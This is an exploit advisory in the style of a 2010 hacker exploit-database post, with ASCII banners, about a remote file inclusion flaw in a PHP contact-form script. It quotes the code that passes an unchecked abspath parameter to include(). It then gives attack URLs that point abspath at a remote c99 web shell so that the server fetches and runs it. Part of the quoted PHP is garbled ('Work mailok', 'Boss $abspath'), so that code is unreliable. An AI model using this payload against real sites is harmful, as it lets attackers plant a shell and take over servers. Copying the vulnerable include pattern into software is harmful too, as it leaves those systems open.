======================================================================
<--= =-->
<--= Simple Attach (Exploitation abspath ) Vulnerability =-->
<--= =-->
<--= K.S.A =-->
======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Name : SA H4x0r .. Abu Saud 0
1 [+] Admin ... e-mail : Ww0@Hotmail.Com 1
0 0
1 ######################################## 1
# #
0 # I'm Saudi Arabia .. TeaM HackErs # 1
# #
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Target: www.upload.com
History: 30/5/2010
Author: Abu SauD
Contact: z3r0.s4.z3r0[at]gmail[dot]Com
Code: http://127.0.0.1/path/contact/contact.php?abspath= [ Shell Txt ]
=====================================================================
Figure : -------
World Development is a site dedicated to open source development;
offering a wide range of mostly free php scripts that will meet your needs.Exploit-db ;)
-=[ Code ]=-
[#]path/contact/contact.php
-----------------------------------------------------------------------------------
<?php
$abspath = "/home/user/public_html/contact/";
/*
This is upload contact form. It's a script that allows people to put a simple contact form on their website
It can be downloaded from http://www.upload.com/
License: GPL
Thank you, "/home/user/public_html/contact/"
*/
include($abspath.'inc/settings.inc.php'); // <= 1
--------
Work mailok($usermsg) {
Boss $abspath;
The ($abspath."inc/badwords.inc.php"); // <= 2
$usermsg = strtoupper($usermsg);
$tmpbad = strtoupper($badwords);
$badwords = explode(",",$tmpbad);
$ding = "GOOD";
$i = 0;
-----------------------------------------------------------------------------------
-=[ Centre ]=-
http://127.0.0.1/path/contact/contact.php?abspath= [SA H4x0r shell]
-=[ Example ]=-
http://upload.com/path/contact/contact.php?abspath=http://c99.txt?
=========================| -=[ Reply to the Centre ]=- |=========================
Thanks Man, ... K.S.A